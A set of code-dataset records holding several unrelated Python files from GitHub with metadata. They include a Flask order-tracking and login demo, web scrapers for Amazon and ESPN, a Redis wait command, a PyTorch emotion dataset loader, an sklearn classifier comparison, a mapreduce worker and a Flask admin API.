"line_number": 193,
"usage_type": "call"
},
{
"api_name": "utils.str_to_time",
"line_number": 217,
"usage_type": "call"
},
{
"api_name": "utils.str_to_... |
70846346343 | import models.data
import models.email_notice
from flask import Flask, request, render_template, redirect, flash, url_for, session, abort
app = Flask(__name__, static_url_path='', root_path='/root/SPM')
@app.route('/')
def index():
    # Landing page: serve the static index.html from the app's static folder.
    return app.send_static_file('index.html')
@app.route('/user_view')
def user_view():
    """Render the logged-in customer's own orders; bounce to login otherwise."""
    if not session.get('logged_in'):
        return redirect(url_for("login"))
    try:
        db = models.data.data_layer()
        user_orders = db.find_all_order_by_username(session["name"])
        return render_template('user_view.html',
                               entries=user_orders,
                               info=session["info"])
    except Exception as problem:
        # Any data-layer/session failure falls back to the login page.
        print(problem)
        return redirect(url_for("login"))
@app.route('/manage_view')
def manage_view():
    """Render every order for a logged-in manager; bounce to login otherwise."""
    if not session.get('logged_in'):
        return redirect(url_for("login", title="manager"))
    try:
        db = models.data.data_layer()
        all_orders = db.find_all_order()
        return render_template('manage_view.html',
                               entries=all_orders,
                               info=session["info"])
    except Exception as problem:
        # Any data-layer/session failure falls back to the login page.
        print(problem)
        return redirect(url_for("login"))
@app.route('/add_order', methods=['POST'])
def add_order():
    """Create a new delivery order for the logged-in user from the posted form."""
    if not session.get('logged_in'):
        abort(401)
    # The order record is the session user plus the posted form fields.
    form_fields = ('number_box', 'd_address', 'a_address',
                   'd_date', 'a_date', 'o_message')
    order_info = {'username': session["name"]}
    for field in form_fields:
        order_info[field] = request.form[field]
    if models.data.data_layer().add_new_order(order_info):
        flash('New entry was successfully posted!')
    else:
        flash('Unknown Error!')
    return redirect(url_for('user_view'))
@app.route('/update_order', methods=['GET', 'POST'])
def update_order():
    """Manager endpoint: GET shows the edit form, POST applies the update.

    On a successful POST the owning customer is notified by email about the
    new order status.
    """
    if not session.get('logged_in'):
        abort(401)
    if request.method == 'POST':
        # Collect every editable column from the posted form.
        order_info = {
            "order_number": request.form['order_number'],
            "status": request.form['status'],
            "d_address": request.form['d_address'],
            "a_address": request.form['a_address'],
            "d_date": request.form['d_date'],
            "a_date": request.form['a_date'],
            "p_date": request.form['p_date'],
            "h_number": request.form['h_number'],
            "o_message": request.form['o_message'],
            "os_message": request.form['os_message'],
        }
        # print(order_info)
        data_connector = models.data.data_layer()
        if data_connector.update_order_by_order_number(order_info):
            flash('This entry was successfully updated!')
            order_number = order_info["order_number"]
            print("order_number:", order_number)
            # Look up the customer's email and send the status notification.
            # NOTE(review): an email failure here would bubble up as a 500
            # after the DB update already succeeded -- confirm that is wanted.
            email_address = data_connector.get_email_by_order_number(order_number)
            print("email_address:", email_address)
            models.email_notice.send_email(email_address, order_info)
        else:
            flash('Unknown Error!')
        return redirect(url_for('manage_view'))
    if request.method == "GET":
        # Pre-fill the edit form with the order's current values.
        order_number = request.args.get('order_number')
        data_connector = models.data.data_layer()
        entire = data_connector.find_order(order_number)
        return render_template('order_modify.html', entire=entire)
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Log a user or manager in.

    GET renders the login form (the 'title' query arg selects the user vs
    manager variant, defaulting to 'user').  POST validates the credentials
    against the data layer, caches the user record in the session, and
    redirects to the matching dashboard.
    """
    error = None
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        title = request.form['title']
        data_connector = models.data.data_layer()
        check_result, userinfo = data_connector.login_check(username, password, title)
        if not check_result:
            # NOTE(review): 'Invaild' is a typo in this user-facing message.
            error = "Invaild username or password!"
            return render_template('login.html', message=error, title=title)
        else:
            # Mark the session as authenticated and cache the user record.
            session['logged_in'] = True
            session["name"] = userinfo["username"]
            session['info'] = userinfo
            flash('You were logged in')
            if title == "manager":
                return redirect(url_for("manage_view"))
            elif title == "user":
                return redirect(url_for("user_view"))
    if request.method == "GET":
        title = request.args.get('title')
        if not title:
            title = "user"
        return render_template('login.html', title=title)
@app.route('/logout')
def logout():
    # Drop the authentication flag (if present) and return to the landing page.
    session.pop('logged_in', None)
    flash('You were logged out')
    return redirect(url_for('index'))
@app.route("/register", methods=['GET', 'POST'])
def register():
    """Customer sign-up: GET renders the form, POST creates the account."""
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        home_address = request.form['home_address']
        phone_number = request.form['phone_number']
        email_address = request.form['email_address']
        user_dict = {"username": username,
                     "password": password,
                     "home_address": home_address,
                     "phone_number": phone_number,
                     "email_address": email_address}
        try:
            data_connector = models.data.data_layer()
            if data_connector.register_new_customer(user_dict):
                message = "Sign up successful!"
                return redirect(url_for("login", message=message))
            else:
                # Treat a False data-layer result the same as an exception.
                raise Exception("Database connect error!")
        except Exception as e:
            # Registration failed (duplicate user, DB down, ...): log and
            # show the blank form again.
            print("Exception(Datalayer): ", e)
            return render_template('register.html')
    else:
        return render_template('register.html')
if __name__ == '__main__':
    # NOTE(review): the hard-coded secret key and debug=True on 0.0.0.0 are
    # acceptable for a demo but must not ship to production -- debug mode
    # exposes the Werkzeug debugger to the network.
    app.secret_key = 'super secret key'
    app.run(host='0.0.0.0', debug=True)
| Elfsong/SPM | demo.py | demo.py | py | 5,888 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "flask.session.get",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "flask.session",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "flask.redirect",
"line... |
29053052757 | from db import session, UniqueVictims, Victims
from sqlalchemy.sql import func
def calc_totals():
    """
    Calculate the total time frame the IP appears in and the udp/tcp/icmp packet
    count as well as the packets/s rate
    :return:
    """
    all_victims = session.query(UniqueVictims).all()
    for victim in all_victims:
        ip = victim.ip
        # Number of Victims rows (time frames) this IP shows up in.
        victim.time_frame_count = session.query(Victims).filter_by(ip=ip).count()
        # Aggregate per-protocol packet counts across all of the IP's rows.
        # NOTE(review): func.sum(...) yields NULL (None) when no rows match,
        # which would make the rate arithmetic below raise -- confirm that a
        # UniqueVictims entry always has at least one matching Victims row.
        victim.tcp_count = session.query(func.sum(Victims.tcp_count).filter(Victims.ip == ip)).scalar()
        victim.udp_count = session.query(func.sum(Victims.udp_count).filter(Victims.ip == ip)).scalar()
        victim.icmp_count = session.query(func.sum(Victims.icmp_count).filter(Victims.ip == ip)).scalar()
        # Packets per second -- presumably each time frame covers 60 seconds
        # (TODO confirm against the capture pipeline).
        victim.rate = (victim.udp_count + victim.tcp_count + victim.icmp_count)/(victim.time_frame_count * 60)
    session.commit()
if __name__ == '__main__':
    # Run the aggregation as a standalone script.
    calc_totals()
| Kbman99/DDoS-Detection | calculate.py | calculate.py | py | 934 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "db.session.query",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "db.UniqueVictims",
"line_number": 11,
"usage_type": "argument"
},
{
"api_name": "db.session",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "db.session.query",
... |
71809107943 | # Import files
from ScrapingProducts.AmazonRateLimiterException import AmazonRateLimiterException
from Utilities.Utils import get_page_source
from Utilities.MetadataUtils import *
# Import libraries
from bs4 import BeautifulSoup
import logging as logger
import time
AMAZON_ERROR = "Sorry! Something went wrong on our end. Please go back and try again or go to Amazon's home page."
def crawl_item(curr_url, retry=0):
    """Scrape a single Amazon product page into a metadata dict.

    Returns a dict with name/topCategory/bottomCategory/price/ASIN/reviews/
    rating/search/url/BSR, or None if the page could not be parsed.  When
    Amazon serves its rate-limit error page, the function sleeps 30 minutes
    and retries, up to three retries deep.
    """
    try:
        page = get_page_source(curr_url)
        if AMAZON_ERROR in page:
            raise AmazonRateLimiterException
        soup1 = BeautifulSoup(page, "html.parser")
        # Re-parse the prettified markup so the extraction helpers see a
        # normalised tree.
        soup2 = BeautifulSoup(soup1.prettify(), "html.parser")
        BSR = get_best_sellers_rank(page)
        top_category = get_top_category(soup2)
        bottom_category = get_bottom_category(soup2)
        # Prefer the top-level category; fall back to the leaf category.
        category = top_category if top_category != "NA" else bottom_category
        return {
            'name': get_name(soup2),
            'topCategory': top_category,
            'bottomCategory': bottom_category,
            'price': get_price(soup2),
            'ASIN': get_asin(curr_url),
            'reviews': get_reviews(soup2),
            'rating': get_rating(soup2),
            'search': get_search(category, curr_url),
            'url': curr_url,
            'BSR': BSR
        }
    except AmazonRateLimiterException:
        print("Amazon is probably blocking us. Will sleep for 1800 seconds and retry")
        time.sleep(1800)
        if retry < 3:
            # BUG FIX: the retry result was previously discarded (no
            # `return`), so every rate-limited call returned None even when
            # the retry succeeded.
            return crawl_item(curr_url, retry + 1)
        return None
    except Exception as e:
        logger.error("Error occurred: " + str(e))
        logger.error("URL:" + str(curr_url))
        return None
| Yogesh19921/Scrapper | CollectingProducts/Crawl.py | Crawl.py | py | 1,798 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "Utilities.Utils.get_page_source",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "ScrapingProducts.AmazonRateLimiterException.AmazonRateLimiterException",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 21,... |
36060739387 | from lxml import html
import requests
# Define parsing function
def parse(score):
return float(score[2:score.index('-')])
def scrape(league_id):
    """Scrape every team's weekly fantasy scores for an ESPN league.

    Returns a list of {'name': <team name>, 'scores': [<float>, ...]} dicts,
    one per team.  The 'Mass Text Appeal III' team is deliberately skipped
    -- TODO confirm why this one team is excluded.
    """
    # Store scores in list
    league_scores = []
    # Loop through each team (ESPN team ids are 1-based; presumably a
    # 12-team league -- verify against the league settings).
    for team_id in range(1, 13):
        # Make request
        page = requests.get('http://games.espn.go.com/ffl/schedule?leagueId=' + league_id + '&teamId=' + str(team_id))
        tree = html.fromstring(page.text)
        # Get team name: first non-blank <h1>, minus the ' Schedule' suffix.
        team_name = tree.xpath('//h1/text()')
        team_name = [name for name in team_name if name != '\n'][0].replace(' Schedule', '')
        # Get weekly scores
        if team_name != 'Mass Text Appeal III':
            # Keep only 'W x-y' / 'L x-y' result links and parse out the
            # team's own score as a float.
            weekly_scores = tree.xpath('//nobr//a[@href]/text()')
            weekly_scores = [score for score in weekly_scores if score != 'Box' and (score[0] == 'W' or score[0] =='L')]
            weekly_scores = list(map(parse, weekly_scores))
            # Store in league_scores list
            league_scores.append({
                'name': team_name,
                'scores': weekly_scores
            })
    return league_scores
{
"api_name": "requests.get",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "lxml.html.fromstring",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "lxml.html",
"line_number": 16,
"usage_type": "name"
}
] |
3353061598 | import time
import redis
from django.core.management import BaseCommand
from django.conf import settings
class Command(BaseCommand):
    """Django management command that blocks until Redis accepts connections.

    Useful as a container entrypoint step so dependent services only start
    once Redis is reachable.
    """

    def handle(self, *args, **options):
        self.stdout.write('Waiting for Redis...')
        redis_instance = redis.StrictRedis(host=settings.REDIS_HOST,
                                           port=settings.REDIS_PORT, db=0)
        # Poll once per second until a PING succeeds; any connection error
        # (refused, DNS, timeout) just triggers another wait.
        while True:
            try:
                redis_instance.ping()
                break
            except Exception:
                # Typo fix: the message previously read 'waititng'.
                self.stdout.write('Redis unavailable, waiting 1 second...')
                time.sleep(1)
        self.stdout.write(self.style.SUCCESS('Redis available!'))
| MykKos/discord_automated_sender | discord_posts/management/commands/check_on_redis.py | check_on_redis.py | py | 671 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.core.management.BaseCommand",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "redis.StrictRedis",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.conf.settings.REDIS_HOST",
"line_number": 11,
"usage_type": "attribute"
},
... |
3751805748 | from __future__ import print_function, division
from torch.utils.data import Dataset, DataLoader
import scipy.io as scp
from keras.utils import to_categorical
import numpy as np
import torch
from matplotlib import pyplot as plt
import warnings
warnings.filterwarnings("ignore")
from matplotlib import pyplot as plt
from scipy.stats.stats import pearsonr
from block import fusions
twenty_six_labels = {'Affection': ['loving', 'friendly'], 'Anger': ['anger', 'furious', 'resentful', 'outraged', 'vengeful'],
'Annoyance': ['annoy', 'frustrated', 'irritated', 'agitated', 'bitter', 'insensitive', 'exasperated', 'displeased'],
'Anticipation': ['optimistic', 'hopeful', 'imaginative', 'eager'],
'Aversion': ['disgusted', 'horrified', 'hateful'],
'Confidence': ['confident', 'proud', 'stubborn', 'defiant', 'independent', 'convincing'],
'Disapproval': ['disapproving', 'hostile', 'unfriendly', 'mean', 'disrespectful', 'mocking', 'condescending', 'cunning', 'manipulative', 'nasty', 'deceitful', 'conceited', 'sleazy', 'greedy', 'rebellious', 'petty'],
'Disconnection': ['indifferent', 'bored', 'distracted', 'distant', 'uninterested', 'self-centered', 'lonely', 'cynical', 'restrained', 'unimpressed', 'dismissive'] ,
'Disquietment': ['worried', 'nervous', 'tense', 'anxious','afraid', 'alarmed', 'suspicious', 'uncomfortable', 'hesitant', 'reluctant', 'insecure', 'stressed', 'unsatisfied', 'solemn', 'submissive'] ,
'Doubt/Conf': ['confused', 'skeptical', 'indecisive'] ,
'Embarrassment': ['embarrassed', 'ashamed', 'humiliated'] ,
'Engagement': ['curious', 'serious', 'intrigued', 'persistent', 'interested', 'attentive', 'fascinated'] ,
'Esteem': ['respectful', 'grateful'] ,
'Excitement': ['excited', 'enthusiastic', 'energetic', 'playful', 'impatient', 'panicky', 'impulsive', 'hasty'] ,
'Fatigue': ['tired', 'sleepy', 'drowsy'] ,
'Fear': ['scared', 'fearful', 'timid', 'terrified'] ,
'Happiness': ['cheerful', 'delighted', 'happy', 'amused', 'laughing', 'thrilled', 'smiling', 'pleased', 'overwhelmed', 'ecstatic', 'exuberant'] ,
'Pain': ['pain'] ,
'Peace': ['content', 'relieved', 'relaxed', 'calm', 'quiet', 'satisfied', 'reserved', 'carefree'] ,
'Pleasure': ['funny', 'attracted', 'aroused', 'hedonistic', 'pleasant', 'flattered', 'entertaining', 'mesmerized'] ,
'Sadness': ['sad', 'melancholy', 'upset', 'disappointed', 'discouraged', 'grumpy', 'crying', 'regretful', 'grief-stricken', 'depressed', 'heartbroken', 'remorseful', 'hopeless', 'pensive', 'miserable'] ,
'Sensitivity': ['apologetic', 'nostalgic'] ,
'Suffering': ['offended', 'hurt', 'insulted', 'ignorant', 'disturbed', 'abusive', 'offensive'],
'Surprise': ['surprise', 'surprised', 'shocked', 'amazed', 'startled', 'astonished', 'speechless', 'disbelieving', 'incredulous'],
'Sympathy': ['kind', 'compassionate', 'supportive', 'sympathetic', 'encouraging', 'thoughtful', 'understanding', 'generous', 'concerned', 'dependable', 'caring', 'forgiving', 'reassuring', 'gentle'],
'Yearning': ['jealous', 'determined', 'aggressive', 'desperate', 'focused', 'dedicated', 'diligent'] ,
'None': ['None']}
class MovieGraphDataset(Dataset):
    """Dataset over per-movie clip features from the MovieGraphs annotations.

    ``data`` maps movie ids (e.g. 'tt0840830') to ``{clip_id: {'face', 'va',
    'embed_description', 'embed_situation', 'embed_scene',
    'embed_transcript', 'emotions'}}``.  Emotion word lists are collapsed
    into 26-way multi-hot vectors using the module-level
    ``twenty_six_labels`` grouping.
    """

    # Per-clip feature keys, in the slot order used below (slots 1..6;
    # slot 0 is the clip count and slot 7 the emotion targets).
    _FEATURE_KEYS = ('face', 'va', 'embed_description', 'embed_situation',
                     'embed_scene', 'embed_transcript')

    def __init__(self, data):
        self.data = data
        self.movie_idx = list(self.data.keys())  # ['tt03045', 'tt0840830' ...] etc
        self.num_samples = len(self.movie_idx)   # 51 movies ideally

        # Hoisted out of the per-clip loop: the label -> index mapping and
        # the identity one-hot table are invariant across clips and movies.
        labels = list(twenty_six_labels.keys())
        integer_mapping = {x: i for i, x in enumerate(labels)}
        encoded = to_categorical([integer_mapping[word] for word in labels])

        self.new_data = {}
        for movie in self.movie_idx:
            clips = list(self.data[movie].keys())
            entry = [len(clips)]
            for key in self._FEATURE_KEYS:
                entry.append(np.array([self.data[movie][clip][key] for clip in clips]))
            entry.append(np.array([self.data[movie][clip]['emotions'] for clip in clips]))
            self.new_data[movie] = entry

            for f in range(len(clips)):
                emot_labels = entry[7][f]
                if len(emot_labels) == 0:
                    # Empty annotation -> explicit 'None' class.
                    emot_labels.append('None')
                # Sum the one-hot rows of every annotated emotion -> multi-hot.
                emot_encoding = [list(encoded[integer_mapping[emot]])
                                 for emot in emot_labels]
                entry[7][f] = [sum(x) for x in zip(*emot_encoding)]
            entry[7] = np.array(list(entry[7]))

    def __len__(self):
        return self.num_samples

    def __getitem__(self, idx):
        """Return one movie's stacked clip features.

        Returns ``(combined, y, F, Va, emb_desc, emb_sit, emb_sce,
        emb_trans)`` where ``combined`` is a numpy hstack of all six feature
        groups, ``y`` the multi-hot emotion targets, and the rest are
        torch.Tensor views of the individual feature groups.
        """
        movie = self.movie_idx[idx]
        _, F, Va, emb_desc, emb_sit, emb_sce, emb_trans, y = self.new_data[movie]
        combined = np.hstack([F, Va, emb_desc, emb_sit, emb_sce, emb_trans])
        # NOTE(review): the original also instantiated fusions.Block modules
        # here and fused the features, but the fused result was never
        # returned or stored, and the randomly initialised blocks were
        # re-created on every call.  That dead computation has been dropped;
        # fusion belongs in the model, not the dataset.
        return (combined, y,
                torch.Tensor(F), torch.Tensor(Va), torch.Tensor(emb_desc),
                torch.Tensor(emb_sit), torch.Tensor(emb_sce),
                torch.Tensor(emb_trans))
def adjust_learning_rate(optimizer, epoch, lr):
    """Decay the learning rate by a factor of 10 once, at epoch 100.

    Every call (re)writes ``lr`` into all of the optimizer's parameter
    groups, so callers must pass the current base learning rate each epoch.

    NOTE: the previous docstring claimed "decayed by 10 every 30 epochs",
    which did not match the implementation; the code only decays when
    ``epoch == 100``.
    """
    if epoch == 100:
        lr = lr * 0.1
    for param_group in optimizer.param_groups:
        param_group['lr'] = lr
def accuracy_multihots(output, target, topk=(1,)):
    """Top-1 accuracy for multi-hot targets.

    Args:
        output: (batch, num_classes) score tensor.
        target: (batch, num_classes) multi-hot ground truth; a value > 0
            marks a positive class.
        topk: kept for interface compatibility; only top-1 is computed.

    Returns:
        A 1-element tensor holding the percentage of samples whose top-1
        prediction is one of the target's positive classes.
    """
    with torch.no_grad():
        # Index of the highest-scoring class for every sample: (batch, 1).
        _, pred = output.topk(1, 1, True, True)
        # Look up the target value at each sample's predicted class.
        target_value = torch.gather(target, 1, pred)
        # Count hits, normalise by batch size, express as a percentage.
        correct_k = (target_value > 0).float().sum(0, keepdim=False).sum(0, keepdim=True)
        correct_k /= target.shape[0]
        return correct_k.mul_(100.0)
class AverageMeter(object):
    """Tracks the latest value and the running average of a metric."""

    def __init__(self):
        self.reset()

    def reset(self):
        """Clear all statistics."""
        self.val = 0    # most recent value
        self.avg = 0    # running mean
        self.sum = 0    # weighted sum of values
        self.count = 0  # total weight seen

    def update(self, val, n=1):
        """Record ``val`` with weight ``n`` and refresh the running mean."""
        self.val = val
        self.sum = self.sum + val * n
        self.count = self.count + n
        self.avg = self.sum / self.count
| affect2mm/emotion-timeseries | emotion-timeseries/MovieGraphs/utils_co_attn.py | utils_co_attn.py | py | 9,455 | python | en | code | 12 | github-code | 36 | [
{
"api_name": "warnings.filterwarnings",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "numpy.array",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "numpy.arr... |
22477753948 |
import numpy as np
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn import model_selection as sk_ms
from sklearn.model_selection import train_test_split
from sklearn.metrics import auc, accuracy_score, f1_score
from sklearn.neural_network import MLPClassifier
RANDOM_SEED = 20
FRAC_TRAIN = 0.8
class Classification(object):
    """Runs a fixed panel of sklearn classifiers on one train/test split."""

    def __init__(self, features, labels):
        self.features = features
        self.labels = labels

    def classification(self):
        """Fit each classifier and return its test accuracy, in order."""
        models = [
            DecisionTreeClassifier(random_state=0),
            KNeighborsClassifier(n_neighbors=5),
            GaussianNB(),
            SVC(kernel='linear', probability=True),
        ]
        # One stratified split, fixed seed, so every model sees the same data.
        X_train, X_test, y_train, y_test = train_test_split(
            self.features, self.labels, stratify=self.labels,
            test_size=(1.0 - FRAC_TRAIN), random_state=RANDOM_SEED)
        results = []
        for model in models:
            model.fit(X_train, y_train)
            y_pred = model.predict(X_test)
            score = accuracy_score(y_test, y_pred)
            print(y_test, y_pred)
            print("Score {}".format(score))
            results.append(score)
        return results

    def get_scores(self):
        """Accuracies of all classifiers as a numpy array."""
        return np.array(self.classification())
| mailaucq/book_classification | classifierv2.py | classifierv2.py | py | 1,771 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sklearn.tree.DecisionTreeClassifier",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "sklearn.neighbors.KNeighborsClassifier",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "sklearn.naive_bayes.GaussianNB",
"line_number": 24,
"usage_typ... |
15596107022 | import os
import traceback
from . import datasets
from . import tasks
from . import util
from logging import getLogger
logger = getLogger('mrs')
class WorkerSetupRequest(object):
    """Request the worker to run the setup function."""

    def __init__(self, opts, args, default_dir):
        # BUG FIX: the original assigned ``self.id = 'worker_setup'`` here,
        # which shadowed the ``id()`` method below and made
        # ``request.id()`` raise TypeError ('str' object is not callable).
        # Every other request class defines id() as a method, so the
        # shadowing attribute is gone.
        self.opts = opts
        self.args = args
        self.default_dir = default_dir

    def id(self):
        """Identifier used to correlate requests with responses."""
        return self.__class__.__name__
class WorkerRemoveRequest(object):
    """Request the worker to delete a directory."""

    def __init__(self, *args):
        # Exactly one positional argument: the directory to remove.
        [self.directory] = args

    def id(self):
        """Identifier used to correlate requests with responses."""
        return self.__class__.__name__
class WorkerTaskRequest(object):
    """Request the to worker to run a task."""

    def __init__(self, *args):
        # Positions 2 and 3 of the 9-tuple are the dataset id and task
        # index; the full tuple is kept for Task.from_args.
        (_prog, _op, self.dataset_id, self.task_index,
         _in, _split, _out, _extra, _last) = args
        self.args = args

    def id(self):
        """Identifier unique to this dataset/task pair."""
        return '%s_%s_%s' % (self.__class__.__name__, self.dataset_id,
                             self.task_index)
class WorkerQuitRequest(object):
    """Request the worker to quit.

    Carries no payload; the message's type alone is the signal.
    """
class WorkerFailure(object):
    """Failure response from worker."""

    def __init__(self, dataset_id, task_index, exception, traceback,
            request_id):
        """Capture everything needed to report the failed task upstream."""
        self.dataset_id, self.task_index = dataset_id, task_index
        self.exception, self.traceback = exception, traceback
        self.request_id = request_id
class WorkerSetupSuccess(object):
    """Successful worker setup.

    Carries no payload; the message's type alone is the signal.
    """
class WorkerSuccess(object):
    """Successful response from worker."""

    def __init__(self, dataset_id, task_index, outdir, outurls, request_id):
        """Record the task identity plus the locations of its output."""
        self.dataset_id, self.task_index = dataset_id, task_index
        self.outdir, self.outurls = outdir, outurls
        self.request_id = request_id
class Worker(object):
    """Execute map tasks and reduce tasks.

    The worker waits for other threads to make assignments by calling
    start_map and start_reduce.

    This needs to run in a daemon thread rather than in the main thread so
    that it can be killed by other threads.
    """

    def __init__(self, program_class, request_pipe):
        self.program_class = program_class
        self.request_pipe = request_pipe
        self.default_dir = None
        self.program = None
        self.opts = None
        self.args = None

    def run(self):
        """Serve requests until a WorkerQuitRequest (or interrupt) arrives."""
        while self.run_once():
            pass

    def run_once(self):
        """Runs one iteration of the event loop.

        Returns True if it should keep running.
        """
        request = None
        response = None
        try:
            request = self.request_pipe.recv()
            if isinstance(request, WorkerSetupRequest):
                assert self.program is None
                self.opts = request.opts
                self.args = request.args
                logger.debug('Starting to run the user setup function.')
                util.log_ram_usage()
                self.program = self.program_class(self.opts, self.args)
                self.default_dir = request.default_dir
                response = WorkerSetupSuccess()
            elif isinstance(request, WorkerQuitRequest):
                return False
            elif isinstance(request, WorkerRemoveRequest):
                util.remove_recursive(request.directory)
            else:
                assert self.program is not None
                logger.info('Running task: %s, %s' %
                        (request.dataset_id, request.task_index))
                util.log_ram_usage()
                max_sort_size = getattr(self.opts, 'mrs__max_sort_size', None)
                t = tasks.Task.from_args(*request.args, program=self.program)
                t.run(self.program, self.default_dir,
                        max_sort_size=max_sort_size)
                response = WorkerSuccess(request.dataset_id,
                        request.task_index, t.outdir, t.outurls(),
                        request.id())
                logger.info('Completed task: %s, %s' %
                        (request.dataset_id, request.task_index))
                util.log_ram_usage()
        except KeyboardInterrupt:
            return
        except Exception as e:
            # BUG FIX: the original handler read request.dataset_id and
            # request.task_index unconditionally, which raised
            # AttributeError (masking the real error) when the failing
            # request was a setup/remove request or when recv() itself
            # failed (request still None).  The id() lookup is likewise
            # guarded.
            dataset_id = getattr(request, 'dataset_id', None)
            task_index = getattr(request, 'task_index', None)
            logger.info('Failed task: %s, %s' % (dataset_id, task_index))
            id_method = getattr(request, 'id', None)
            request_id = id_method() if callable(id_method) else None
            tb = traceback.format_exc()
            response = WorkerFailure(dataset_id, task_index, e, tb,
                    request_id)

        if response:
            self.request_pipe.send(response)
        return True

    def profiled_run(self):
        """Like run(), but writes a cProfile dump via util.profile_loop."""
        # TODO: detect the node number for other systems (e.g., pbs)
        nodenum = os.getenv('PSSH_NODENUM')
        if nodenum:
            filename = 'mrs-worker-%s.prof' % nodenum
        else:
            filename = 'mrs-worker.prof'
        util.profile_loop(self.run_once, (), {}, filename)
class WorkerManager(object):
    """Mixin class that provides methods for dealing with Workers.

    Assumes that a worker_pipe attribute is defined and that
    read_worker_pipe is called when data is available.  Also assumes that a
    current_task attribute is available.
    """

    def worker_setup(self, opts, args, default_dir):
        # Synchronous handshake: send the setup request and block on the
        # worker's reply before any tasks may be submitted.  Returns True
        # on success, False on a reported failure.
        request = WorkerSetupRequest(opts, args, default_dir)
        self.worker_pipe.send(request)
        response = self.worker_pipe.recv()
        if isinstance(response, WorkerSetupSuccess):
            return True
        if isinstance(response, WorkerFailure):
            msg = 'Exception in Worker Setup: %s' % response.exception
            logger.critical(msg)
            msg = 'Traceback: %s' % response.traceback
            logger.error(msg)
            return False
        else:
            raise RuntimeError('Invalid message type.')

    def read_worker_pipe(self):
        """Reads a single response from the worker pipe."""
        r = self.worker_pipe.recv()
        if not (isinstance(r, WorkerSuccess) or isinstance(r, WorkerFailure)):
            assert False, 'Unexpected response type'
        # The response must correspond to the task we believe is in flight.
        assert self.current_task == (r.dataset_id, r.task_index)
        self.current_task = None
        if isinstance(r, WorkerSuccess):
            self.worker_success(r)
        elif isinstance(r, WorkerFailure):
            msg = 'Exception in Worker: %s' % r.exception
            logger.critical(msg)
            msg = 'Traceback: %s' % r.traceback
            logger.error(msg)
            self.worker_failure(r)

    def submit_request(self, request):
        """Submit the given request to the worker.

        If one_at_a_time is specified, then no other one_at_time requests
        can be accepted until the current task finishes.  Returns a boolean
        indicating whether the request was accepted.

        Called from the RPC thread.
        """
        if isinstance(request, WorkerTaskRequest):
            # Only one task may be outstanding at a time.
            if self.current_task is not None:
                return False
            self.current_task = (request.dataset_id, request.task_index)
        self.worker_pipe.send(request)
        return True

    def worker_success(self, response):
        """Called when a worker sends a WorkerSuccess for the given task."""
        raise NotImplementedError

    def worker_failure(self, response):
        """Called when a worker sends a WorkerFailure for the given task."""
        raise NotImplementedError
# vim: et sw=4 sts=4
| byu-aml-lab/mrs-mapreduce | mrs/worker.py | worker.py | py | 7,442 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "traceback.format_exc",
"line_number": 143,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 154,
"usage_type": "call"
}
] |
44037875301 | from flask import Blueprint, request, jsonify
from flask_cors import CORS
from storeback.models import db
from storeback.models.admins import Admin
admin_api = Blueprint('admin_api', __name__)
CORS(admin_api)
@admin_api.route('/api/admin', methods=['GET'])
def get_all_admins():
    """List admins, filtered by any query-string parameters.

    NOTE(review): request.args is forwarded verbatim to filter_by, so a
    caller can filter on any Admin column and an unknown key raises a
    server error -- consider whitelisting the filterable fields.
    """
    params = request.args
    admins = Admin.query.filter_by(**params).all()
    return jsonify([admin.to_json() for admin in admins])
@admin_api.route('/api/admin/<int:id>', methods=['GET'])
def get_one_admin(id):
    """Return a single admin as JSON; 404 when the id is unknown."""
    found = Admin.query.filter_by(id=id).first_or_404()
    return jsonify(found.to_json())
@admin_api.route('/api/admin', methods=['POST'])
def create_one_admin():
    """Create an admin from a JSON body and return it as JSON.

    Requires firstname, lastname, email and password; the password is
    stored hashed, never in plain text.
    """
    if not request.json:
        return 'Please provide a valid json body with your request', 400
    # ROBUSTNESS: the original indexed request.json directly, so a missing
    # field surfaced as an unhandled KeyError (HTTP 500).  Validate up
    # front and answer 400 instead.
    required = ('firstname', 'lastname', 'email', 'password')
    missing = [field for field in required if field not in request.json]
    if missing:
        return 'Missing required field(s): %s' % ', '.join(missing), 400
    admin = Admin()
    admin.firstname = request.json['firstname']
    admin.lastname = request.json['lastname']
    admin.email = request.json['email']
    admin.password = Admin.generate_hash(request.json['password'])
    db.session.add(admin)
    db.session.commit()
    return jsonify(admin.to_json())
@admin_api.route('/api/admin/<int:id>', methods=['PATCH'])
def patch_one_admin(id):
    """Apply the JSON body as a column update to one admin.

    NOTE(review): the body is passed straight to .update(), so any column
    can be mass-assigned -- including 'password', which would be stored
    UNHASHED here (create_one_admin hashes it).  Verify and restrict the
    updatable fields.
    """
    if not request.json:
        return 'Please provide a valid json body with your request', 400
    Admin.query.filter_by(id=id).update(request.json)
    db.session.commit()
    # Re-read so the response reflects the committed row (404 if missing).
    patched_admin = Admin.query.filter_by(id=id).first_or_404()
    return jsonify(patched_admin.to_json())
